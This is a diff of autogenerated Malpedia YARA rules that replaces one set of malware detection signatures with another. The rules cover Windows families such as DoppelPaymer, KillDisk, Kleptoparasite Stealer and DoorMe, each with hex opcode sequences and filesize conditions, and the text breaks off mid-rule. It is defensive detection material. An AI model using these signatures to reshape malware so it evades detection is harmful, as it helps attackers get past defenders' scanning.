"https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.murkytop_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_080" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_080_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "c9438f0871f1117619cdcbc50e1d21cb20b4d3848dd8784e1c0798685d05cf91" + logic_hash = "a554ba61b72496370ffd16dee0c3f2b6444ec6fc0c35b79b5428032562bbd4cc" score = 75 quality = 75 tags = "FILE" @@ -133130,32 +135786,32 @@ rule MALPEDIA_Win_Murkytop_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7c17 b8555555d5 f7e9 c1fa02 8bc2 c1e81f 03c2 } - $sequence_1 = { 56 e8???????? 83c410 8b9d1befffff 8d9c1defeeffff 33f6 8bff } - $sequence_2 = { 83e01f c1f905 8b0c8de0f54100 c1e006 0fbe440104 83e040 } - $sequence_3 = { 8d4508 50 6a00 57 6a00 6800130000 ff15???????? } - $sequence_4 = { 56 ffd7 50 ff15???????? 85c0 0f850b010000 } - $sequence_5 = { 8b1d???????? 56 57 8bf8 8d45f8 } - $sequence_6 = { 8b3d???????? 8bc7 85ff 7e16 8d0cfd48f54100 8b11 } - $sequence_7 = { c1fa02 8955d4 3bdf 754e } - $sequence_8 = { 897de4 c745e014000000 897dec 894dd8 8945dc } - $sequence_9 = { c1e106 030c9de0f54100 eb02 8bca f641247f 7526 83f8ff } + $sequence_0 = { 51 53 8bd8 837b2c00 56 7571 8b4324 } + $sequence_1 = { 0bf2 89701c 83c020 83c120 ff8d74ffffff 0f8560feffff 8b8570ffffff } + $sequence_2 = { 8b4508 8b4808 8b500c 2bd1 894dfc 3bd3 7277 } + $sequence_3 = { 3bd6 7312 8b03 833c9000 8d0490 7402 } + $sequence_4 = { 8dbd40ffffff e8???????? 8bb53cffffff 83c620 c645fc0f 8b06 33ff } + $sequence_5 = { 83e73f 0b0cbdb8840210 83e03f 0b0c85b8860210 8b42f4 33c6 8bf8 } + $sequence_6 = { 8bec 83ec10 53 8bd8 ff4320 56 33f6 } + $sequence_7 = { 8bf0 83feff 7509 c68568ffffff0b eb66 8b4dbc } + $sequence_8 = { 57 50 8d45f4 64a300000000 33ff 33f6 } + $sequence_9 = { 8b4e30 8d5508 52 8b562c 50 51 52 } condition: - 7 of them and filesize <294912 + 7 of them and filesize <392192 } -rule MALPEDIA_Win_Roll_Sling_Auto : FILE +rule MALPEDIA_Win_Playwork_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2ab89f07-526d-5404-82a8-065dc4627e90" + id = "18efebc1-2ecf-5ebd-a5ef-f5649e46ba89" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roll_sling" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.roll_sling_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.playwork_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "57322c90ec2e7f0f9b25a02d63cfaa81737587c7821fd15face6c16907aace76" + logic_hash = "a4351b5bd2d1c3d515bb6fc22faeca44797e61833bdb6ed02e20384700f78521" score = 75 quality = 75 tags = "FILE" @@ -133169,32 +135825,32 @@ rule MALPEDIA_Win_Roll_Sling_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33c9 ff15???????? 48898424a8000000 4c8bf8 4885c0 7431 ff15???????? } - $sequence_1 = { 4c8b7dd8 3b5c2440 7306 488b4dd0 ebb9 498bcd } - $sequence_2 = { b80d000000 41bf0a000000 440f44f8 33db 4c03f7 0f1f4000 66660f1f840000000000 } - $sequence_3 = { 488b55d0 4883fa10 0f824effffff 48ffc2 488b4db8 488bc1 4881fa00100000 } - $sequence_4 = { 488905???????? 498bde 4883fa10 480f431d???????? 4803d9 41b823000000 } - $sequence_5 = { 0f86ec000000 eb0a 48b92700000000000080 e8???????? 4885c0 0f84cc000000 488d7827 } - $sequence_6 = { e8???????? 41c6042f00 48893e 488bc6 4c8b6c2460 488b7c2458 } - $sequence_7 = { 41b801010000 e8???????? 418bc6 4d8d4d10 4c8d3d04180100 41be04000000 } - $sequence_8 = { eb14 4889742420 4c8d4da0 488bd6 } - $sequence_9 = { 7476 48895c2438 4533c9 4533c0 48897c2420 bad8070000 } + $sequence_0 = { a801 7410 e8???????? 6a1a 99 59 } + $sequence_1 = { 3350fc 0fb6c9 8bf2 c1ee18 } + $sequence_2 = { 68???????? eb48 68???????? eb41 68???????? 8d85e8f7ffff 68???????? } + $sequence_3 = { 8b5008 89560c 8b500c 83e904 895610 0f8469010000 } + $sequence_4 = { 3dea000000 0f850e020000 8b5dfc 85db } + $sequence_5 = { 8bdf c1eb10 3330 83c010 8975dc 0fb6f3 } + $sequence_6 = { 8b4014 894618 8d4e1c c1c808 8bd8 8bd0 } + $sequence_7 = { 03c8 81f9ffff0000 7d04 56 53 ffd7 56 } + $sequence_8 = { 8d8594f7ffff 50 8d85f4fdffff 50 ff15???????? } + $sequence_9 = { 0fb6db 3370fc 8bce 8975f8 c1e918 8b3c8d34573f00 8b4df0 } condition: - 7 of them and filesize <299008 + 7 of them and filesize <360448 } -rule MALPEDIA_Win_Carrotball_Auto : FILE +rule MALPEDIA_Win_Unidentified_104_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8d1dffb9-f801-5b51-998b-8e4431af5d29" + id = "e8a556d0-f78d-5a2d-8efe-d7e4f2e8c4f0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotball" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.carrotball_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_104" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_104_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "8cb2e3b01c31931d0c5f23b61551aa799de8dd787a3493373f0ac01ba6f109d9" + logic_hash = "e638b20b38ac304bb33832304ee0b9b7e6ee0e08465f3d2f98dbc6a372f89d7d" score = 75 quality = 75 tags = "FILE" @@ -133208,32 +135864,32 @@ rule MALPEDIA_Win_Carrotball_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? eb36 68???????? 56 ff15???????? } - $sequence_1 = { 6a04 58 6bc000 c7807430001002000000 6a04 } - $sequence_2 = { 5f 8b4dfc 33cd 33c0 e8???????? 8be5 5d } - $sequence_3 = { ffd6 5e 5f 8b4dfc 33cd 33c0 } - $sequence_4 = { 68???????? ff15???????? eb36 68???????? 56 } - $sequence_5 = { 8bf0 85f6 0f84ac000000 68???????? } - $sequence_6 = { 56 ff15???????? 85c0 7432 8d85ecfdffff } - $sequence_7 = { ff15???????? 8bf8 85ff 0f84d9000000 56 } - $sequence_8 = { ff15???????? 8bf0 85f6 0f84ac000000 68???????? 56 ff15???????? } - $sequence_9 = { 6bc000 c7807430001002000000 6a04 58 6bc000 } + $sequence_0 = { 4c8d0d20070100 33c9 4c8d050f070100 488d1510070100 e8???????? 4885c0 } + $sequence_1 = { 4c03e9 4d33cd 498bd9 49c1e918 48c1e328 4933d9 4803c3 } + $sequence_2 = { 410fb6401b 4c0bc8 410fb6401a 49c1e108 4c0bc8 49c1e104 4c03c9 } + $sequence_3 = { 48c1e128 4933c9 4c8b8c2490000000 498b8180000000 4803c1 4803e8 4c33c5 } + $sequence_4 = { 4883fa10 0f8288000000 48ffc2 488b4dc7 488bc1 483bd7 728f } + $sequence_5 = { 415d 415c 5f 5e 5d c3 488d5ed8 } + $sequence_6 = { 418848fe c1e810 c1e918 418800 41884801 4d8d4004 4983e901 } + $sequence_7 = { e8???????? 33c0 4883c420 5b c3 8bd3 488bc8 } + $sequence_8 = { 49c1e330 4c33da 4903f3 4889b424a0000000 4833ce 488b742418 488bd1 } + $sequence_9 = { 7230 48ffc2 488b8dc0000000 488bc1 4881fa00100000 7215 } condition: - 7 of them and filesize <40960 + 7 of them and filesize <263168 } -rule MALPEDIA_Win_Homefry_Auto : FILE +rule MALPEDIA_Win_Killdisk_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a10ca8d8-82df-517d-ba70-a87080178507" + id = "fd586ea1-d41c-50af-ab00-4c3fd6d8b593" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.homefry_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.killdisk_auto.yar#L1-L172" license_url = "N/A" - logic_hash = "17959e0d47a35ecd2de71b5f2bf7c90338d7ed773cdd572cf03461913b5cbcc7" + logic_hash = "5e0faf26e496f52d500cc74a0d402009c944ca198565834d2511070577fb34d3" score = 75 quality = 75 tags = "FILE" @@ -133247,32 +135903,38 @@ rule MALPEDIA_Win_Homefry_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 4863d5 4803d0 488b05???????? 488917 48630a } - $sequence_1 = { 4889b5f0020000 4803cb ff15???????? 85c0 7873 488b95f0020000 } - $sequence_2 = { 740f 8bcf 4803cd 7408 } - $sequence_3 = { 8b4c2470 ff15???????? 8b4c2478 488905???????? ff15???????? 488b0d???????? } - $sequence_4 = { c705????????94000000 ff15???????? 33d2 8d4a02 ff15???????? 488bd8 } - $sequence_5 = { e8???????? 84c0 0f8418010000 48833d????????00 48899c24a0000000 4889b424a8000000 7471 } - $sequence_6 = { ff15???????? 488bcb ff15???????? 4881c420040000 } - $sequence_7 = { 488bc8 e8???????? 84c0 7426 48630d???????? 488bc3 85c9 } - $sequence_8 = { e8???????? eb05 e8???????? 84c0 7511 488d0ddd180000 } - $sequence_9 = { 483bdd 72d0 488bcf ff15???????? 33c0 488b5c2430 488b6c2438 } + $sequence_0 = { 8d4604 7204 8b08 eb02 8bc8 66891c51 } + $sequence_1 = { 0f8424020000 8d4c245c b8???????? 8d642400 668b10 } + $sequence_2 = { 881438 e8???????? 9c c6442408cf 894508 e9???????? } + $sequence_3 = { 88742408 c70424ba7bbfa4 660fbae408 662dca11 e8???????? 881438 e8???????? } + $sequence_4 = { 83c40c 68???????? 68e08fc201 e8???????? 8bf0 } + $sequence_5 = { 8f44241c c64424148e c644240426 e8???????? 4e e8???????? 54 } + $sequence_6 = { c3 50 ff15???????? 8b8c24d41a0000 } + $sequence_7 = { 872d???????? 0fc1c2 89e2 66d3c9 66d3c0 } + $sequence_8 = { e8???????? 84c0 751a a1???????? 50 6802000080 } + $sequence_9 = { b001 5e 59 c3 837f1800 7413 } + $sequence_10 = { e8???????? 83c420 6a00 8d442414 } + $sequence_11 = { 46 66892c24 9c 8d64244c e9???????? 9c 9c } + $sequence_12 = { 9c 8d642430 e9???????? ff742404 66894500 } + $sequence_13 = { 8d642454 e9???????? 880424 8774242c 9c 68a12348dd e8???????? } + $sequence_14 = { 66897c240c 882c24 c64424044f 8d642454 e9???????? } + $sequence_15 = { 56 e8???????? c1f805 56 8d3c85a098c201 } condition: - 7 of them and filesize <65536 + 7 of them and filesize <10817536 } -rule MALPEDIA_Win_Banpolmex_Auto : FILE +rule MALPEDIA_Win_Dented_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f5c73e0b-c575-562f-9127-4bdfc5c88735" + id = "484f6875-8da3-59df-9796-ec6e3c5f3480" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.banpolmex" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.banpolmex_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dented" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dented_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "5c80d00898c7981631095abf56b16c379bf161bce0c3d518d50cadc7dd22c1a6" + logic_hash = "e9882555c27a882adee62a69216aa411600cf976159b592ea9f38f19d9990be3" score = 75 quality = 75 tags = "FILE" @@ -133286,34 +135948,34 @@ rule MALPEDIA_Win_Banpolmex_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7419 4c8b0f 8bd0 41b801000000 498bcc e8???????? 4883f801 } - $sequence_1 = { ff15???????? 488d1530980800 488bcb 488905???????? ff15???????? 488d1529980800 488bcb } - $sequence_2 = { c3 488d15ea560200 488bcf e8???????? b80a000000 488b5c2460 4883c420 } - $sequence_3 = { 0f97c0 890d???????? 4883c428 c3 8b0d???????? 44891d???????? 3bc1 } - $sequence_4 = { 448d4201 4d8bb4c5a8010000 488bcb e8???????? 85c0 7919 488d156ca70100 } - $sequence_5 = { 4d016810 4d016018 49017020 49017828 49015830 4d015838 4d015040 } - $sequence_6 = { 660f1f440000 483bd5 7733 488bca 4869c988000000 4903c9 428b44210c } - $sequence_7 = { 4883ec28 488b0d???????? 4885c9 7409 83caff ff15???????? 33c0 } - $sequence_8 = { 4c8b5c2420 488b442428 4c011b 480107 0fb7442438 66ffc0 6689442438 } - $sequence_9 = { 4c897c2458 3c02 0f85a4000000 41b803000000 4533ff 898c24a8000000 44898424b0000000 } + $sequence_0 = { 8bf1 e8???????? 83c40c 89bd60ffffff 8d8560ffffff 50 ff15???????? } + $sequence_1 = { 50 51 ebc7 6a0f 33db 5f 897df4 } + $sequence_2 = { ffd6 ff75fc ffd6 6a00 6a01 8d4d08 e8???????? } + $sequence_3 = { ff15???????? 3d0e000780 7422 3d08000c80 741b } + $sequence_4 = { 8985c4fcffff 8d85f4fdffff 6a40 8985c8fcffff 8d85b4fcffff 5e 50 } + $sequence_5 = { 8d4dc0 e8???????? 385dc4 7508 6a04 } + $sequence_6 = { 6a40 5f 57 8d45b8 } + $sequence_7 = { 8b85f8f7ffff 8a8485fcfbffff 32c1 880416 8b8decf7ffff } + $sequence_8 = { 48 0d00ffffff 40 8a0a 8985f8f7ffff 8bbdf8f7ffff 0fb6c1 } + $sequence_9 = { 8b4a38 3b08 6a0f 0f4208 33db 8b4210 } condition: - 7 of them and filesize <1555456 + 7 of them and filesize <450560 } -rule MALPEDIA_Win_Misfox_Auto : FILE +rule MALPEDIA_Win_Kleptoparasite_Stealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "927dd41c-de40-5a62-bc60-3c93a08d5568" + id = "d0389ad4-24e3-5ce2-885f-8e2d3c44dd15" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.misfox_auto.yar#L1-L171" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kleptoparasite_stealer_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "73f8e08e5f0adb2064a67b9bd6b00ebff7c94d43d789ff956746926b45ea1124" - score = 75 - quality = 75 + logic_hash = "1caf749c6c15dea159c6ab2428d269f9b9674545b72666548fcdc2b3e50e89c9" + score = 60 + quality = 35 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -133325,38 +135987,32 @@ rule MALPEDIA_Win_Misfox_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb6a 56 e8???????? 59 8365fc00 8b049d50870110 } - $sequence_1 = { 3de4000000 7309 8b04c598230110 5d c3 33c0 5d } - $sequence_2 = { c705????????01000000 6a04 58 6bc000 8b4d08 8988ac830110 } - $sequence_3 = { 50 e8???????? 83c40c 6b45e430 8945e0 8d8020770110 8945e4 } - $sequence_4 = { c745e4ec900110 a1???????? 33db 43 895de0 50 } - $sequence_5 = { ff37 c745b800000000 53 6a00 51 } - $sequence_6 = { 8b45b8 52 c70300000000 40 ff37 8945b8 } - $sequence_7 = { 0f8515010000 51 ba00020000 c744244800080000 8d4c2434 89442444 } - $sequence_8 = { 48c7c101000080 c7450b00020000 4889442420 44897507 ff15???????? } - $sequence_9 = { 458bc5 488d9530060000 4803d0 488b442448 488d0dc6da0000 } - $sequence_10 = { 488b4c2470 48894b10 48895318 e9???????? 488d5720 } - $sequence_11 = { 488985a0040000 4c8b95f8040000 488d052ce00000 4c8bd9 488d4c2430 } - $sequence_12 = { f0ff0b 7516 488d0564520100 488b4c2430 483bc8 } - $sequence_13 = { 488d15fdbc0000 483305???????? 488bcb 488905???????? ff15???????? 488d15f7bc0000 } - $sequence_14 = { ff15???????? 85c0 7547 488b0f 488d15dd6b0100 } - $sequence_15 = { 753e 0fb65530 0fb64531 66410fafd5 } + $sequence_0 = { 7405 8901 895104 8be5 5d c3 3b0d???????? } + $sequence_1 = { ebe4 6a0c 68???????? e8???????? 8365e400 33c0 8b7d08 } + $sequence_2 = { e8???????? cc 55 8bec 56 e8???????? 8b7508 } + $sequence_3 = { 895104 8be5 5d c3 3b0d???????? 7502 } + $sequence_4 = { b8???????? c3 e9???????? 55 8bec 56 e8???????? } + $sequence_5 = { 59 c3 6a10 68???????? e8???????? 33ff 897de0 } + $sequence_6 = { 895104 8be5 5d c3 3b0d???????? } + $sequence_7 = { cc 55 8bec 56 e8???????? 8b7508 6a02 } + $sequence_8 = { 8901 895104 8be5 5d c3 3b0d???????? 7502 } + $sequence_9 = { c3 e9???????? 55 8bec 56 e8???????? 8bf0 } condition: - 7 of them and filesize <266240 + 7 of them and filesize <3006464 } -rule MALPEDIA_Win_Cinobi_Auto : FILE +rule MALPEDIA_Win_Highnote_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "853d9242-221d-59c1-ad19-29eb6c5779a8" + id = "9754f7b1-01be-5dce-8939-9dbedbd321d3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cinobi" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cinobi_auto.yar#L1-L162" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.highnote" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.highnote_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "57c1141de6150455825b72381295eb849d072a659e2915f93f96811cd61f7768" + logic_hash = "63e3b329a81995d654d7d4235beb319e224a0ea782f84de7ddd9bdcbead90225" score = 75 quality = 75 tags = "FILE" @@ -133370,37 +136026,32 @@ rule MALPEDIA_Win_Cinobi_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c9 c3 55 8bec 51 e8???????? 58 } - $sequence_1 = { 8845df 8b45bc 8a400c 8845e0 } - $sequence_2 = { 0f8554010000 6a04 58 8b4df4 } - $sequence_3 = { 33c0 66898588faffff 8b85a8faffff 660fbe4008 66898584f5ffff 8b85a8faffff 660fbe4020 } - $sequence_4 = { e8???????? 59 59 84c0 751e 6810270000 } - $sequence_5 = { 8a4642 88842456010000 8a4647 88842457010000 8a4646 88842458010000 } - $sequence_6 = { 8b45f8 8b75f4 83c0f0 50 } - $sequence_7 = { ff705f 8b45c0 ffb0b7000000 ff75dc } - $sequence_8 = { 8b45c0 ff705f 8b45c0 ffb09f000000 ff75dc e8???????? 83c40c } - $sequence_9 = { 2402 88460e b001 5f 5b } - $sequence_10 = { 6880000000 ff7508 8b45f8 ff5073 ff7508 8b45f8 } - $sequence_11 = { 8b45bc 8a4053 8845f7 8b45bc 8a400c 8845f8 } - $sequence_12 = { 57 6800100000 ff75f8 ff75f0 ff9303010000 } - $sequence_13 = { 885de0 8a5823 884de9 8a4839 885de1 8a581d 884dea } - $sequence_14 = { 8b85a8faffff 660fbe4003 668945ba 8b85a8faffff 660fbe4013 } + $sequence_0 = { b3a7 8cd7 a5 329ea1afa9a5 5d b5a5 } + $sequence_1 = { 2d620a682c fd 9d 8945ec 8945f0 8945f4 9c } + $sequence_2 = { 3665017cf341 14b0 63c5 ef d550 3362db } + $sequence_3 = { 0fb6c9 8a1408 0fb6da 03de 81e3ff000080 } + $sequence_4 = { 98 fd bfb47ea0c6 ddbb690cc1af 6595 fa 6a23 } + $sequence_5 = { 115542 305421f0 d438 bd4dae2b31 b1f7 } + $sequence_6 = { 90 9e a4 3634a1 6594 2424 e230 } + $sequence_7 = { 2ca7 33e6 7479 1e 0477 ed 7cb1 } + $sequence_8 = { 8636 35cfd6d703 b368 321e 4a 727d 51 } + $sequence_9 = { 000b 2920 da927a3741d4 7e5b a7 5a 40 } condition: - 7 of them and filesize <32768 + 7 of them and filesize <321536 } -rule MALPEDIA_Win_Crenufs_Auto : FILE +rule MALPEDIA_Win_Doppelpaymer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f753eb30-be4b-5f62-9991-28649f65a79a" + id = "f239cfc1-7cb1-5c3d-a2a9-bf2ad44d0856" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.crenufs_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.doppelpaymer_auto.yar#L1-L181" license_url = "N/A" - logic_hash = "62adacba8819f400983ac2aed5807f2d80c5566db3c1a2873916dcd6fb658c9d" + logic_hash = "6c7514bbe70399e920b266dcf23ab956c2fd28d40abc6464ad39f41a291bdfca" score = 75 quality = 75 tags = "FILE" @@ -133414,32 +136065,40 @@ rule MALPEDIA_Win_Crenufs_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b0c8de0934000 25ff000000 c1ea18 33cb 8b1c95e08f4000 8b56f8 } - $sequence_1 = { 55 56 57 8bf9 8a4c2444 33ed 884c2425 } - $sequence_2 = { ff15???????? 56 8d4d90 c645fc05 ff15???????? 56 8d4de0 } - $sequence_3 = { ffd0 83c408 53 ff15???????? 8b44243c 8b4e08 3bc5 } - $sequence_4 = { 59 50 57 8d4de0 ff15???????? bf???????? 57 } - $sequence_5 = { 750c 8b3d???????? 891d???????? 8d4c2444 ff15???????? 3bfb 7409 } - $sequence_6 = { ff15???????? 8d8d3cf2ffff c645fc03 e8???????? c645fc02 56 } - $sequence_7 = { 84c0 89542410 743e 3b31 752d 53 56 } - $sequence_8 = { 8d4c2444 895c2428 895c2430 33ff ff15???????? a1???????? 48 } - $sequence_9 = { 895dfc e8???????? 8b10 8bc8 ff5210 } + $sequence_0 = { 80790600 7523 80790264 751d } + $sequence_1 = { 80790561 7517 80790361 7511 80790474 } + $sequence_2 = { e8???????? 8b08 e8???????? 3db6389096 } + $sequence_3 = { 83ec28 6800002002 6a00 6a01 } + $sequence_4 = { 80790264 751d 80790561 7517 } + $sequence_5 = { baffffff7f 43 e8???????? 3bd8 } + $sequence_6 = { 8d8c2450010000 e8???????? 89bc245c010000 8d442404 } + $sequence_7 = { e8???????? 8d8c2424030000 e8???????? 6a10 } + $sequence_8 = { c20400 8b4e44 8b4110 5e } + $sequence_9 = { 8955ec e8???????? 8d0d6f302b00 890424 894c2404 e8???????? 8d0d34302b00 } + $sequence_10 = { 890c24 8945c8 e8???????? 8b4de8 890c24 8945c4 } + $sequence_11 = { c3 8b45e8 b99054c837 8a55f3 80c2c9 2b4df4 } + $sequence_12 = { 83ec08 8b4508 8b4054 89e1 894104 } + $sequence_13 = { 8945c4 74d0 e9???????? 31c0 8b4db8 83c104 } + $sequence_14 = { 5b 5d c3 b8e2f49a29 2b45ec 8b4dcc 81c1ffff0000 } + $sequence_15 = { e8???????? 8b4de8 8b55d8 895128 8b75c4 897114 } + $sequence_16 = { a1???????? ffd0 8945bc 31c0 8b4de8 83c154 8b55e8 } + $sequence_17 = { c20400 8b400c 8b4810 56 8b700c 57 } condition: - 7 of them and filesize <106496 + 7 of them and filesize <7266304 } -rule MALPEDIA_Win_Unidentified_099_Auto : FILE +rule MALPEDIA_Win_Doorme_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "855e4e32-6d4e-59ad-a575-6df1a0196662" + id = "86390d1e-5c43-5440-9d47-06677f2da02f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_099" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_099_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.doorme_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "258a0ad9f77598150260878a992142883eda125a250cf06189b6139c76537e6e" + logic_hash = "36db3801adbf1063a2540e3d2f2d2feff6537948c8fe3ef7123221f42e10e308" score = 75 quality = 75 tags = "FILE" @@ -133453,32 +136112,32 @@ rule MALPEDIA_Win_Unidentified_099_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4d8bc4 418bd6 498bcf e8???????? 4c8d8df0010000 458bc6 498bd7 } - $sequence_1 = { 488d4808 e8???????? 488d057dec0000 488903 488bc3 } - $sequence_2 = { 488d0deb1effff 48c1e602 0fb784b910600100 488d9100570100 488d8d24030000 4c8bc6 4803cb } - $sequence_3 = { 0fb6842930ef0100 4883c103 8802 488d5201 4881f959010000 7ce5 4533c9 } - $sequence_4 = { 443820 75e4 8bca ffc2 4803c9 } - $sequence_5 = { 488bd6 488be8 4d8d4715 488d442468 488bcd 4889442420 e8???????? } - $sequence_6 = { 85c0 7424 8b15???????? 33c0 85d2 7418 } - $sequence_7 = { 488d5b01 4883ef01 75d8 33c0 488dbdf0010000 } - $sequence_8 = { ba02000000 660f1f440000 488d8980000000 0f1000 0f104810 } - $sequence_9 = { c7442470fedcba98 c744247476543210 660f1f440000 49ffc0 42803c0000 75f6 488d55d0 } + $sequence_0 = { 48837e1810 7203 488b16 4c8b4610 488d4d58 e8???????? 488d5558 } + $sequence_1 = { 75f6 488bd7 488d4d68 e8???????? 90 4c8d8d10010000 } + $sequence_2 = { 41b111 41b207 450fb6da b312 0fb6f9 40b618 4533e4 } + $sequence_3 = { 488b05???????? 4833c4 48894537 488bda 488bf9 4889552f c6459700 } + $sequence_4 = { 498b7810 4885ff 7566 48897a10 } + $sequence_5 = { 488d5c2478 48837d9010 480f435c2478 488d05a23f0300 488945a0 c74424400e000000 } + $sequence_6 = { 488b00 498bcd ff5020 48894580 498b4500 498bcd ff5018 } + $sequence_7 = { 75f1 4983e801 75db 4883c510 4c8d15f06b0300 48836c243001 0f8564feffff } + $sequence_8 = { 488d8d20030000 e8???????? 488b7d80 488b07 488bcf ff5050 } + $sequence_9 = { 4889442440 448bc2 48894c2420 488bd9 } condition: - 7 of them and filesize <314368 + 7 of them and filesize <580608 } -rule MALPEDIA_Win_Payloadbin_Auto : FILE +rule MALPEDIA_Win_Dropshot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2565adb0-0fc6-53d7-a6d7-714ee1e92525" + id = "f835fd17-f919-5a07-a5c9-cff4292c1163" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.payloadbin" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.payloadbin_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dropshot_auto.yar#L1-L98" license_url = "N/A" - logic_hash = "23ee48d932fb0666838e9fe4bd35ace2ae0b6a999ccab2645c6692a493a38f19" + logic_hash = "98ce90f78c6e888102f62c73a346864796873af9c7b795369b519cebc67a4ac6" score = 75 quality = 75 tags = "FILE" @@ -133492,32 +136151,30 @@ rule MALPEDIA_Win_Payloadbin_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb05 bb08000000 488b0d???????? 4c8bc7 33d2 ff15???????? 413bdf } - $sequence_1 = { 668930 41c0f1c1 0fb70f 488bd7 450ad1 